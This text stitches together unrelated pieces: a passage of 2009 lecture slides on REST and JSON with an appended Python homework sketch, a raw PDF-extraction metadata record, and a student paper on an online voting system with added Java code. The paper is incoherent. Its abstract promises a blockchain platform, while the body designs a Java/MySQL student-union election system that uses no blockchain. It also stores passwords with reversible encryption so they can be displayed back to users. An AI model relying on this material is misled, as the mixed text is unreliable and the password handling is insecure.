representation may indicate the current state of the requested resource, the desired state for the requested resource, or the value of some other resource […]. # REST ## Table 17-1. 
HTTP Methods for REST
<table>
<thead>
<tr> <th>Method</th> <th>CRUD Operation</th> <th>Description</th> </tr>
</thead>
<tbody>
<tr> <td>GET</td> <td>Retrieve</td> <td>Retrieves the representation of a resource.</td> </tr>
<tr> <td>HEAD</td> <td></td> <td>Retrieves metadata for the representation and resource.</td> </tr>
<tr> <td>POST</td> <td>Create</td> <td>In the strict sense, POST creates a resource. In the real world, however, POST is typically used to create, update, and even delete a resource. It is normal to use REST services that support only GET and POST.</td> </tr>
<tr> <td>PUT</td> <td>Update</td> <td>Updates a resource. More often than not, you will not see this method used in the real world but instead will see POST used to perform the actions.</td> </tr>
<tr> <td>DELETE</td> <td>Delete</td> <td>Deletes a resource. Just like PUT, in the real world this is rarely used, and instead POST is used in its place.</td> </tr>
</tbody>
</table>

Theory vs. Practice Chapter "Representational State Transfer (REST)" in "Pro PHP XML and Web Services", R. Richards, pp. 633–672 (2006) - How has this theory influenced current practice?

REST applied to HTTP
- The REST service is expressed as a URL and is accessed with basic HTTP requests.
- The HTTP verb is important: a GET is a read operation, POST is a creation, and PUT makes updates to the service.
- The return payload is usually XML or JSON.
http://dev2dev.bea.com/pub/a/2007/05/google-mashups.html

JSON (JavaScript Object Notation) is a data interchange format. It is minimal, textual, and a subset of JavaScript.

What is JSON?
- Lightweight data-interchange format (compared to XML)
- Simple format
- Easy for humans to read and write
- Easy for machines to parse and generate
- JSON is a text format
- Programming language independent
- Uses conventions that are familiar to programmers of the C-family of languages, including C, C++, C#, Java, JavaScript, Perl, Python

JSON Structures
- A collection of name/value pairs
  - In various languages, this is realized as an object, record, struct, dictionary, hash table, keyed list, or associative array
- An ordered list of values
  - In most languages, this is realized as an array, vector, list, or sequence
- These are universal data structures supported by most modern programming languages

JSON Object Notation
- A JSON object is an unordered set of name/value pairs
- A JSON object begins with { (left brace) and ends with } (right brace)
- Each name is followed by : (colon) and the name/value pairs are separated by , (comma)
- The types represented in JSON are strings, numbers, booleans, objects, arrays, and null.

JSON vs. XML
```json
{"menu": {
  "id": "file",
  "value": "File",
  "popup": {
    "id": "file",
    "value": "Save",
    "onclick": "CreateNewDoc()"
  }
}}
```
(Slide callouts label the start of JSON objects and arrays, the names and values, and the commas separating name/value pairs.)

JSON (http://www.json.org/fatfree.html)
- JSON has **no version number**. No revisions to the JSON grammar are anticipated. "If something has a 1.0, it will inevitably get a 1.1 and a 2.0, and everything is crap until it is 3.0. JSON is very stable."
- JSON **doesn't have namespaces**. Every object is a namespace: its set of keys is independent of all other objects, even exclusive of nesting. JSON uses context to avoid ambiguity, just as programming languages do.
- JSON **is not extensible**. "It does not need to be.
It can represent any non-recurrent data structure as is. JSON is flexible. New fields can be added to existing structures without obsoleting existing programs.” Text to Object Conversion in JavaScript code ```javascript var myObject = eval('(' + myJSONtext + ')'); ``` - To convert a JSON text into an JSON object, use the `eval()` function - `eval()` invokes the JavaScript compiler - Since JSON is a proper subset of JavaScript, the compiler will correctly parse the text and produce an object structure JSON Slides taken from Sang Shin, Java Technology Architect, Sun Microsystems, Inc Security & JSON Parser // Include http://www.json.org/json.js var myObject = myJSONtext.parseJSON(); - eval() can compile and execute any JavaScript program, so there can be security issues (cross-site scripting) - Use eval() when the source can be trusted - When security is a concern - the source cannot be trusted - it is better to use a JSON parser - A JSON parser will only recognize JSON text and so is much safer How to Receive JSON Data at the Client Side - JSON data is received as a string - Calling `eval()` will generate JSON object in JavaScript code ```javascript var JSONdata = eval(req.responseText); ``` - Once you have JSON object, you can use . notation to access its properties ```javascript var name = JSONdata.name; var address = JSONdata.addresses[3]; var streetname = JSONdata.addresses[3].street; ``` # Approximate Course Schedule <table> <thead> <tr> <th>Month</th> <th>MatLab Exercises</th> <th>Yahoo Boss Search Challenge</th> <th>Optional! Google Online Marketing Challenge</th> </tr> </thead> <tbody> <tr> <td>March</td> <td>Today: HA1.1</td> <td></td> <td></td> </tr> <tr> <td></td> <td>Next week: HA1.2</td> <td></td> <td></td> </tr> <tr> <td>April</td> <td></td> <td>Easter holidays</td> <td><strong>Overlap!</strong></td> </tr> <tr> <td>May</td> <td></td> <td></td> <td></td> </tr> <tr> <td>June</td> <td></td> <td></td> <td></td> </tr> </tbody> </table> **Overlap!** Home Assignment 1.1 Network Examples [Images of network diagrams] Home Assignment 1.1 Get familiar with REST APIs - http://www.programmableweb.com/ with Pajek and the Pajek .net Format - http://vlado.fmf.uni-lj.si/pub/networks/pajek/ - http://iv.slis.indiana.edu/Im/Im-pajek.html Useful Links JSON Reader Tool - http://jsontools.berlios.de/ Eclipse Plugin ANTLR (parser generator) - http://antlr4eclipse.sourceforge.net/ Other JSON Tools - http://www.json.org/java/ For questions please post to the newsgroup: Your tutors Gabi and Ingo will try to help with your questions Any questions? See you next week!
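As a starting point for Home Assignment 1.1, the following Python sketch shows how you might call a REST-style interface, parse the JSON response, and write the resulting network in the Pajek .net format. The URL and the structure of the JSON response ("user", "friends") are placeholders; adapt them to whichever API you actually use.

```python
# Sketch: HTTP GET against a REST-style API, JSON parsing (safer than eval()),
# and output of a one-mode network as a Pajek .net file.
import json
import urllib.request

def fetch_json(url):
    """Perform an HTTP GET and parse the JSON body."""
    with urllib.request.urlopen(url) as resp:
        return json.loads(resp.read().decode("utf-8"))

def write_pajek(edges, path):
    """Write an undirected one-mode network as a Pajek .net file."""
    nodes = sorted({n for edge in edges for n in edge})
    index = {name: i + 1 for i, name in enumerate(nodes)}  # Pajek vertices are 1-based
    with open(path, "w") as f:
        f.write(f"*Vertices {len(nodes)}\n")
        for name, i in index.items():
            f.write(f'{i} "{name}"\n')
        f.write("*Edges\n")
        for a, b in edges:
            f.write(f"{index[a]} {index[b]}\n")

if __name__ == "__main__":
    # Placeholder URL and response structure; replace with the real API call.
    data = fetch_json("http://api.example.org/friends?user=alice")
    edges = [(data["user"], friend) for friend in data["friends"]]
    write_pajek(edges, "network.net")
```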
{"Source-Url": "http://markusstrohmaier.info/courses/SS2009/707.000_web-science/slides/week-web-technologies-I.pdf", "len_cl100k_base": 5841, "olmocr-version": "0.1.53", "pdf-total-pages": 51, "total-fallback-pages": 0, "total-input-tokens": 69330, "total-output-tokens": 7374, "length": "2e12", "weborganizer": {"__label__adult": 0.0004856586456298828, "__label__art_design": 0.0011663436889648438, "__label__crime_law": 0.00048613548278808594, "__label__education_jobs": 0.06890869140625, "__label__entertainment": 0.00021135807037353516, "__label__fashion_beauty": 0.00032258033752441406, "__label__finance_business": 0.0005888938903808594, "__label__food_dining": 0.0005507469177246094, "__label__games": 0.0006260871887207031, "__label__hardware": 0.0020580291748046875, "__label__health": 0.0006346702575683594, "__label__history": 0.0007119178771972656, "__label__home_hobbies": 0.00031447410583496094, "__label__industrial": 0.0007171630859375, "__label__literature": 0.0009031295776367188, "__label__politics": 0.00031948089599609375, "__label__religion": 0.0008974075317382812, "__label__science_tech": 0.0943603515625, "__label__social_life": 0.0005373954772949219, "__label__software": 0.033660888671875, "__label__software_dev": 0.7900390625, "__label__sports_fitness": 0.0003559589385986328, "__label__transportation": 0.000713348388671875, "__label__travel": 0.0004029273986816406}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 21966, 0.01539]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 21966, 0.56601]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 21966, 0.84691]], "google_gemma-3-12b-it_contains_pii": [[0, 263, false], [263, 531, null], [531, 1084, null], [1084, 1750, null], [1750, 1945, null], [1945, 2081, null], [2081, 2292, null], [2292, 2447, null], [2447, 2566, null], [2566, 3524, null], [3524, 4113, null], [4113, 4578, null], [4578, 5188, null], [5188, 5649, null], [5649, 5961, null], [5961, 6922, null], [6922, 8028, null], [8028, 8146, null], [8146, 8930, null], [8930, 8988, null], [8988, 9540, null], [9540, 10169, null], [10169, 10551, null], [10551, 10877, null], [10877, 11143, null], [11143, 11681, null], [11681, 12020, null], [12020, 12298, null], [12298, 12671, null], [12671, 12963, null], [12963, 13719, null], [13719, 14411, null], [14411, 14881, null], [14881, 15449, null], [15449, 16413, null], [16413, 16926, null], [16926, 17439, null], [17439, 17813, null], [17813, 18053, null], [18053, 18141, null], [18141, 18229, null], [18229, 18506, null], [18506, 19192, null], [19192, 19543, null], [19543, 20054, null], [20054, 20477, null], [20477, 21258, null], [21258, 21372, null], [21372, 21419, null], [21419, 21932, null], [21932, 21966, null]], "google_gemma-3-12b-it_is_public_document": [[0, 263, true], [263, 531, null], [531, 1084, null], [1084, 1750, null], [1750, 1945, null], [1945, 2081, null], [2081, 2292, null], [2292, 2447, null], [2447, 2566, null], [2566, 3524, null], [3524, 4113, null], [4113, 4578, null], [4578, 5188, null], [5188, 5649, null], [5649, 5961, null], [5961, 6922, null], [6922, 8028, null], [8028, 8146, null], [8146, 8930, null], [8930, 8988, null], [8988, 9540, null], [9540, 10169, null], [10169, 10551, null], [10551, 10877, null], [10877, 11143, null], [11143, 11681, null], [11681, 12020, null], [12020, 12298, null], [12298, 12671, null], [12671, 12963, null], [12963, 13719, null], [13719, 14411, null], [14411, 14881, 
null], [14881, 15449, null], [15449, 16413, null], [16413, 16926, null], [16926, 17439, null], [17439, 17813, null], [17813, 18053, null], [18053, 18141, null], [18141, 18229, null], [18229, 18506, null], [18506, 19192, null], [19192, 19543, null], [19543, 20054, null], [20054, 20477, null], [20477, 21258, null], [21258, 21372, null], [21372, 21419, null], [21419, 21932, null], [21932, 21966, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 21966, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 21966, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 21966, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 21966, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 21966, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 21966, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 21966, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 21966, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 21966, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 21966, null]], "pdf_page_numbers": [[0, 263, 1], [263, 531, 2], [531, 1084, 3], [1084, 1750, 4], [1750, 1945, 5], [1945, 2081, 6], [2081, 2292, 7], [2292, 2447, 8], [2447, 2566, 9], [2566, 3524, 10], [3524, 4113, 11], [4113, 4578, 12], [4578, 5188, 13], [5188, 5649, 14], [5649, 5961, 15], [5961, 6922, 16], [6922, 8028, 17], [8028, 8146, 18], [8146, 8930, 19], [8930, 8988, 20], [8988, 9540, 21], [9540, 10169, 22], [10169, 10551, 23], [10551, 10877, 24], [10877, 11143, 25], [11143, 11681, 26], [11681, 12020, 27], [12020, 12298, 28], [12298, 12671, 29], [12671, 12963, 30], [12963, 13719, 31], [13719, 14411, 32], [14411, 14881, 33], [14881, 15449, 34], [15449, 16413, 35], [16413, 16926, 36], [16926, 17439, 37], [17439, 17813, 38], [17813, 18053, 39], [18053, 18141, 40], [18141, 18229, 41], [18229, 18506, 42], [18506, 19192, 43], [19192, 19543, 44], [19543, 20054, 45], [20054, 20477, 46], [20477, 21258, 47], [21258, 21372, 48], [21372, 21419, 49], [21419, 21932, 50], [21932, 21966, 51]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 21966, 0.09598]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
396aa2c8e4140afffbcbc38159466ddde32a36ed
Online Voting System Noor Ahmed¹, Prof. Anupama Pattanasetty² ¹PG Student, Department of Artificial Intelligence and Data Science, Sharnbasava University Kalaburagi, Karnataka, India. nnoorahmedd@gmail.com ²Professor, Department of Computer Science, Sharnbasava University Kalaburagi, Karnataka, India. anubngp.pama10@gmail.com ABSTRACT Having a democratic voting system in place is crucial for any nation due to the general distrust of the conventional voting system. Individuals have seen the infringement of their basic rights. Lack of transparency has been a problem with several electronic voting methods. The government has a hard time winning the confidence of its citizens since most voting processes aren’t transparent enough. It is easy to abuse, which is why both the old and new digital voting systems have failed. Finding solutions to issues with both the paper and electronic voting systems, such as voting-related injustices and accidents, is the main goal. A fair election with less injustice is possible with the use of blockchain technology integrated into the voting process. Both digital and physical voting methods have their limitations, making them unsuitable for widespread use. This evaluates the importance of finding a way to protect people's democratic rights. To foster confidence between voters and election officials, this article introduces a platform built on blockchain technology, which maximises system stability and transparency. Without the need for traditional polling places, the proposed technology lays the groundwork for digital voting using blockchain. A scalable blockchain may be supported by our suggested architecture via the use of adaptable consensus algorithms. The voting process is made more secure with the use of the Chain Security algorithm. When conducting a chain transaction, smart contracts provide a safe channel of communication between the user and the network. There has also been talk of the voting system’s security being based on blockchain technology. Keywords: Voting system, attributes, Use case diagram, TCP I. INTRODUCTION In this context, "voting" means making a selection. Voting or other electoral processes may facilitate this kind of expression. Votes cast via a particular electronic media may be collected, counted, and saved electronically through electronic voting. The planned project’s primary objective is to replace the University of Westminster Student Union's present paper-based election method with an electronic one. At now, the student union's voting method is experiencing low voter participation since it is inconvenient for the majority of students. This problem will be solved by the proposed method, which would allow voters to choose their candidates using any computer with an internet connection. This project will analyse the student union's present voting procedure and find a way to model it with the online voting system that will be put into place. Voting procedures will be handled by the system through various election mechanisms. The system will be designed with a strong emphasis on security. These safeguards will be in place from the moment a voter enters the voting system until they leave, ensuring that every step of the voting process is secure. Voters will be unable to cast multiple ballots for the same candidates thanks to the system's robust security measures. II. LITERATURE SURVEY Various approaches and procedures are used in the numerous activities aimed at introducing modifications to electronic and online voting systems. 
Although some of these measures do a good job of protecting the system's secrecy and security, complex technologies are still required to oversee and manage the voting process and all of the related data.

2.1 BASIC E-VOTING APPROACH/ARCHITECTURE

To ensure the safe transmission of data, systems designed to facilitate digital voting via internet portals and smart devices use a variety of encryption and decryption mechanisms.

- **HOMOMORPHIC ENCRYPTION TECHNIQUE:** Homomorphic encryption is a strong and widely used method, recognised for its many applications, and it has recently been applied to online voting system design. The voting system discussed here is based on the exponential El Gamal cryptosystem: every vote is encrypted with the exponential El Gamal algorithm before it is submitted. Because of the additive homomorphism of this cryptosystem, encrypted votes can be tallied directly, without decrypting the individual ballots; a toy illustration of this additive property follows.
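The sketch below is purely illustrative and is not the paper's implementation. It uses toy parameters (far too small for real use; a real system would use a standardised group of at least 2048 bits) to show how exponential El Gamal ciphertexts are multiplied component-wise to add the underlying votes, and how the final tally is recovered:

```java
import java.math.BigInteger;
import java.security.SecureRandom;

public class ExpElGamalTallyDemo {
    public static void main(String[] args) {
        SecureRandom rnd = new SecureRandom();
        BigInteger p = BigInteger.probablePrime(256, rnd); // toy modulus
        BigInteger g = BigInteger.valueOf(2);
        BigInteger x = new BigInteger(255, rnd);           // secret key
        BigInteger h = g.modPow(x, p);                     // public key h = g^x

        int[] votes = {1, 0, 1, 1, 0};                     // 1 = yes, 0 = no
        BigInteger a = BigInteger.ONE, b = BigInteger.ONE; // running products

        for (int v : votes) {
            BigInteger r = new BigInteger(255, rnd);       // fresh randomness
            BigInteger c1 = g.modPow(r, p);                // g^r
            BigInteger c2 = g.modPow(BigInteger.valueOf(v), p)
                             .multiply(h.modPow(r, p)).mod(p); // g^v * h^r
            a = a.multiply(c1).mod(p);                     // multiplying ciphertexts
            b = b.multiply(c2).mod(p);                     // ... adds the votes
        }
        // Decrypt only the aggregate: b / a^x = g^(sum of votes)
        BigInteger gSum = b.multiply(a.modPow(x, p).modInverse(p)).mod(p);
        // The tally is small, so recover it by brute force over the exponent.
        for (int t = 0; t <= votes.length; t++) {
            if (g.modPow(BigInteger.valueOf(t), p).equals(gSum)) {
                System.out.println("yes votes: " + t);     // prints 3
                break;
            }
        }
    }
}
```

The key point is that only the aggregate g^(Σv) is ever decrypted; individual ballots stay encrypted, and the brute-force search at the end is cheap because the tally is bounded by the number of voters.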
- **CENTRALIZED ARCHITECTURE:** There are many methods for encoding data to safeguard it from tampering during transmission to the network. A downside, however, is that once the data is placed in the database, a great deal of trust and security is required. Because of the security risks posed by hacking and other forms of unauthorised access, centralised storage is a poor fit for highly valuable data.

Fig:1 Centralized Architecture of Voting system

The centralised architectural technique reuses previous models and designs, which raises potential ethical and security concerns. Collecting all the data in one place puts it at risk and leaves it susceptible to unjust control; with the aid of blockchain technology, a fair framework can circumvent this issue by storing data in a distributed manner. A blockchain is a distributed ledger that records all transactions in chronological order. In a traditional database, a single entity is responsible for upkeep and maintenance; that entity has full authority over the database and may do whatever it wants with the recorded data, including adding fake data, censoring otherwise legitimate modifications, or manipulating the data itself. In most cases this is not an issue, because the organisation maintaining the database does so for its own benefit and has no reason to falsify its contents. A financial network, however, is an example of a use case where the stored data is too sensitive, and the temptation to manipulate it too great, to let a single organisation have complete control over the database.

2.2 AIMS AND OBJECTIVES

The goals and objectives of the system to be developed are as follows:

- Create an online voting system that allows citizens to choose their preferred candidates.
- Establish a safe authentication mechanism so that only authorised users may access the voting system.
- Construct a database for keeping track of votes and user data.
- Investigate any security flaws in the system and put a plan into action to prevent unauthorised access to the voting process.
- Enable vote counting per candidate.
- Construct a backend administrative section to facilitate efficient administration of the election system.
- Build the administrator's tools to add, remove, and edit the details of users, candidates, and sub-administrators on the system.
- Present the results of the vote graphically so that the administrator may examine them.
- Allow people to vote for the candidates of their choice.
- Permit voters to peruse candidate biographies throughout the voting process.
- Record the exact time each vote was cast by adding a timestamp to the database, so that administrators can easily produce reports based on the results of the vote.
- Stop people from casting multiple ballots for the same candidates.

III. INTERNET TECHNOLOGY

The Internet is a system of publicly accessible, globally distributed computer networks that employ the Transmission Control Protocol/Internet Protocol (TCP/IP) suite to transfer data in packet-switched form. A thorough investigation of internet technology was necessary, as it would be used to transmit data between the voting system's client and server.

3.1 INTERNET HISTORY

The Internet began as a research effort in the late 1960s aimed at better understanding computer-to-computer data transfer using packet switching. The study was funded by ARPA, part of the US Department of Defence. In a packet-switched network, data packets may travel along any route between their origin and destination [9], with distinct network addresses identifying the sender and the recipient. The ARPANET network came into being as a result of this research. Version four of the Internet Protocol, which TCP/IP networks would use, was developed in 1978. In 1983 the ARPANET, formerly run by DARPA, was transferred to the Defence Communications Agency (DCA); this change allowed broad usage in educational institutions around the globe, and the Internet's popularity skyrocketed.

3.2 TCP/IP PROTOCOL SUITE

The TCP/IP protocol suite is a network architecture that allows multiple networks to be interconnected. Its reference model is made up of several layers that work together to provide data transfer across the internet. The layers and their functions are described below; a minimal client-side example follows Figure 2.

**Application Layer:** Supports the suite of high-level protocols included in the TCP/IP package. Here you find the File Transfer Protocol (FTP), which moves files between hosts; the Domain Name System (DNS), the Virtual Terminal Protocol (TELNET), the Simple Mail Transfer Protocol (SMTP), and other protocols are also accommodated at this layer.

**Transport Layer:** Facilitates data transfer between two hosts on a network. In the TCP/IP reference model, two protocols coexist at the transport layer, which sits above the internet layer: the User Datagram Protocol (UDP) and the Transmission Control Protocol (TCP), both discussed in more detail later in the paper. Because it is a connectionless protocol, UDP does not ensure that datagrams arrive at their destination, and it performs none of the flow or congestion control that TCP does.

**Internet Layer:** The foundation of the TCP/IP protocol suite. Its main function is to direct data packets as they travel from one network to another; Internet Protocol packets are delivered to their particular destinations via this layer.

**Network Access Layer:** The lowest layer in the Internet reference model. At this level sit the protocols that the host machine uses to communicate with the other nodes in the network.

Fig:2 TCP/IP Reference model
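As a concrete illustration of how an application hands data to the transport layer, the short Java client below opens a TCP connection, writes a line, and reads a reply. The host name, port, and message are placeholders; the paper does not specify an endpoint:

```java
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.net.Socket;

public class TcpEchoClient {
    public static void main(String[] args) throws IOException {
        // Constructing the Socket performs TCP's three-way handshake.
        try (Socket socket = new Socket("localhost", 8080);
             PrintWriter out = new PrintWriter(socket.getOutputStream(), true);
             BufferedReader in = new BufferedReader(
                     new InputStreamReader(socket.getInputStream()))) {
            out.println("hello");              // TCP sequences and, if needed,
            System.out.println(in.readLine()); // retransmits these bytes for us
        }                                      // closing performs the FIN exchange
    }
}
```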
3.3 INTERNET PROTOCOL

Packet transmission is a fundamental function provided by the Internet Protocol, a data-oriented protocol that makes packet switching possible in a packet-switched network. As a packet service, IP is not foolproof: it cannot guarantee the delivery of data packets from their originator to their destination, and IP data packets are susceptible to duplication, latency, and loss. Datagrams may instead be delivered reliably by using the Transmission Control Protocol. The Internet Protocol is defined at the Internet layer of the TCP/IP reference model.

3.4 TRANSMISSION CONTROL PROTOCOL

The Transmission Control Protocol (TCP) is the most widely used protocol in the Internet Protocol family. TCP is a dependable, connection-oriented protocol that ensures error-free transmission of data packets across the Internet from one computer to another, allowing hosts on a network to reliably send and receive datagrams and packets. TCP ensures that data packets travel from their origin to their final destination, and it also separates the data of different programmes running on the same host at the same time, such as an email server and a web server. Guaranteed delivery and in-order sequencing are two essential features that TCP provides and the Internet Protocol does not: TCP assigns each transmitted data packet a sequence number, which the destination host uses to reassemble the stream.

IV. SYSTEM DESIGN

4.1 DATABASE DESIGN

Before the online voting system can be developed, a database must be established to hold all the data collected from its users. The database will also greatly aid in enforcing and enhancing the security of the voting system, since it will hold the user information used for authentication. Because of its low cost and availability as open-source software, the MySQL database server has been chosen as the preferred database; its large storage capacity will be crucial for the volume of data to be entered.

4.1.1 Entities & Attributes

Entities and attributes serve as the building blocks of the database structure. The entities are represented by the database tables to be constructed, and the tables store various fields, represented as attributes. These attributes may be configured to hold text or numeric values, among other data types. Each entity has an attribute holding a primary key, a value that uniquely identifies a row in a table. Entity relationship diagrams were constructed to illustrate the database's logical structure and the links between entities; these diagrams can be found in Appendix C, and all database entities are described in the entity table. A hedged sketch of how two of these entities might be created in MySQL follows the figures below.

**DATABASE ENTITY & ATTRIBUTE DIAGRAM**

Fig:3 Administrator entity with its attributes
Fig:4 Users entity with its attributes
Fig:5 Candidate entity with its attributes
Fig:6 Voters' entity with its attributes
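Since the entity diagrams themselves are in Appendix C and are not reproduced here, the column names below are assumptions, chosen to match the objectives in section 2.2 (vote timestamps, single-vote enforcement); the connection URL and credentials are placeholders:

```java
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.Statement;

public class SchemaSetup {
    public static void main(String[] args) throws Exception {
        try (Connection con = DriverManager.getConnection(
                 "jdbc:mysql://localhost:3306/voting", "appuser", "apppass");
             Statement st = con.createStatement()) {
            // Candidate entity: candidate_id is the primary-key attribute.
            st.executeUpdate("CREATE TABLE candidate ("
                + "candidate_id INT PRIMARY KEY AUTO_INCREMENT,"
                + "full_name    VARCHAR(100) NOT NULL,"
                + "profile      TEXT)");
            // Voters entity: has_voted supports the single-vote rule;
            // vote_time is the timestamp requirement from the objectives.
            st.executeUpdate("CREATE TABLE voter ("
                + "voter_id   INT PRIMARY KEY AUTO_INCREMENT,"
                + "username   VARCHAR(50) UNIQUE NOT NULL,"
                + "password   VARCHAR(255) NOT NULL,"   // stored encrypted (4.2.4)
                + "has_voted  BOOLEAN DEFAULT FALSE,"
                + "vote_time  TIMESTAMP NULL)");
        }
    }
}
```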
4.2 SOFTWARE DESIGN

A software design details the algorithms to be used, the user interfaces through which the system's components are operated, the data that will be part of the system, and the structure of the programme to be implemented. Before any part of the online voting system is built, the system software must be carefully considered and designed. All the steps needed to complete a given task within the system are considered during the software design phase. Two design methodologies may be used to develop a well-structured design, and the system design will demonstrate the data flow inside the system. Structured software modelling uses a technique called functional decomposition to break the system down into sets of interdependent functions, giving a top-down, function-oriented approach to software development; this model primarily uses data flow diagrams to illustrate the inner workings of a system. Object-Oriented Design (OOD) helps developers simplify their projects by using self-contained objects that interact with one another; object-oriented designs are commonly expressed with UML modelling diagrams. [4]

4.2.1 Use Case Modeling

When representing the system's architecture to an end user, it is crucial to use an end-user-friendly design approach and avoid the complicated technical jargon a system analyst might use. The requirements of the online voting system may be represented through use case modelling, which shows the potential interactions between the system and its users. The people whose job it is to interact with the various parts of the system are called "actors"; the administrators and voters are the most important ones. The use case model shows which parts of the system each actor will engage with.

**ADMINISTRATOR USE CASE DIAGRAM**

**VOTER USE CASE DIAGRAM**

4.2.2 System Access Design

The system's implementation is contingent on robust authentication capabilities: authentication is a must to guarantee that only authorised users may access the system, and the design of the login access is crucial to the security of the voting system. Administrators and voters should access the system through different login pages, and the system will give each actor separate access privileges so that voters cannot reach the administrator's page. As part of the login page design, each user type has its own Java class that verifies login credentials against the system database using SQL statements; a sketch of such a check appears below. If the data submitted is incorrect or does not match the information in the database, an error message is returned to the user in the form of a JavaBean.

Fig:9 Displays the system's access login design

A basic difficulty for any secure system is users forgetting their chosen passwords, and an adequate facility has to be built to cope with this problem. In the voting system's design, the administrators' and voters' login pages are linked to a page where users can retrieve forgotten passwords. Every user must register a memorable word that can be used to retrieve their password from the system's database; the Java servlets have validation functions built into them, so users cannot retrieve their passwords unless they provide the right username and secret phrase.
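Here is a minimal sketch of that credential check, assuming the voter table from the schema sketch above; the servlet mapping, redirect targets, and connection details are illustrative only, and in the full design the submitted password would first pass through the encryption step described in section 4.2.4:

```java
import java.io.IOException;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class VoterLoginServlet extends HttpServlet {
    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        String user = req.getParameter("username");
        String pass = req.getParameter("password"); // real system: encrypt first
        try (Connection con = DriverManager.getConnection(
                 "jdbc:mysql://localhost:3306/voting", "appuser", "apppass");
             // Parameterised query: the driver escapes the inputs for us
             PreparedStatement ps = con.prepareStatement(
                 "SELECT voter_id FROM voter WHERE username = ? AND password = ?")) {
            ps.setString(1, user);
            ps.setString(2, pass);
            try (ResultSet rs = ps.executeQuery()) {
                if (rs.next()) {
                    req.getSession().setAttribute("voterId", rs.getInt("voter_id"));
                    resp.sendRedirect("ballot.jsp");        // on to the ballot
                } else {
                    resp.sendRedirect("login.jsp?error=1"); // bad credentials
                }
            }
        } catch (SQLException e) {
            throw new ServletException(e);
        }
    }
}
```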
4.2.3 Administrator & Voter Design

Once the authentication procedure is complete and their authority has been confirmed, the administrator and voter gain access to their designated areas. After choosing a candidate to vote for and logging out of the system, a voter can no longer access the system. The administrator may add, remove, and view administrators, candidates, and voters; when candidates' names are added or removed, the voter's JSP page dynamically updates to reflect the changes.

4.2.4 System Security Design

The proposed system must include robust security measures to protect the integrity of the voting process, which is of the utmost importance. To make the system more secure, three types of security mechanism were built into it to protect the database and the data flowing through it. These measures must be employed in addition to the login facility; a sketch of the encryption step follows Table 1.

**Table:1 Security features to be implemented in the system**

<table>
<thead>
<tr>
<th>Feature</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>System access attempts log</strong></td>
<td>The database keeps track of how many times a user tries to log in with the wrong password. Once a set threshold of attempts is reached, the system automatically locks the user out. The purpose of this measure is to stop password guessing.</td>
</tr>
<tr>
<td><strong>Password Encryption</strong></td>
<td>Passwords entered into the system are encrypted before storage, rendering the stored passwords worthless if the database were stolen. A decryption step restores an encrypted password to its original form before it is displayed to the user on the forgotten-password page.</td>
</tr>
<tr>
<td><strong>Secure Socket Layer (SSL) Transmission</strong></td>
<td>All data entered through the user's browser is encrypted in transit, so that an eavesdropper cannot read it.</td>
</tr>
</tbody>
</table>
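Because the forgotten-password page must show the original password back to the user, Table 1 calls for reversible encryption rather than one-way hashing. Below is a sketch of such a step; the algorithm choice, hard-coded demo key, and ECB mode are illustrative assumptions only (a real deployment would manage keys properly, use an authenticated cipher mode, and today would normally prefer salted one-way hashing instead):

```java
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;

public class PasswordCipher {
    // 16-byte demo key; never hard-code keys in a real deployment.
    private static final SecretKeySpec KEY =
        new SecretKeySpec("0123456789abcdef".getBytes(), "AES");

    // Applied before the password is written to the voter table.
    public static String encrypt(String plain) throws Exception {
        Cipher c = Cipher.getInstance("AES/ECB/PKCS5Padding");
        c.init(Cipher.ENCRYPT_MODE, KEY);
        return Base64.getEncoder()
                     .encodeToString(c.doFinal(plain.getBytes("UTF-8")));
    }

    // Applied by the forgotten-password page before display.
    public static String decrypt(String stored) throws Exception {
        Cipher c = Cipher.getInstance("AES/ECB/PKCS5Padding");
        c.init(Cipher.DECRYPT_MODE, KEY);
        return new String(c.doFinal(Base64.getDecoder().decode(stored)), "UTF-8");
    }
}
```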
4.2.5 System Architecture

Several technologies on the client and server sides collaborate to form the system's architecture.

FRONT END: The front end is the voting system's user interface, accessed through the user's web browser. Here users communicate with the server by sending and receiving HTTP requests; the base of the system is constructed using HTML.

BACKEND: The back end, on the server side of the programme, processes all HTTP requests that come in from the client. The servlet and JSP files are loaded by a Tomcat server engine; the engine services requests, and the client receives the dynamic content as HTML for browsing. Data submitted from the system's client is saved in a database, specifically MySQL. The JDBC driver acts as a middleware layer, translating Java method calls into database API calls and allowing the server to exchange data with the database.

Fig:12 System Architecture

V. TESTING

The system needs extensive testing to guarantee flawless operation. During the testing phase, the online voting system's features are double-checked to ensure they function as intended, and any bugs or flaws are found. An appropriate testing technique must be chosen to carry out the testing process efficiently, taking into account the size and complexity of the system to be tested.

5.1 TEST STRATEGIES

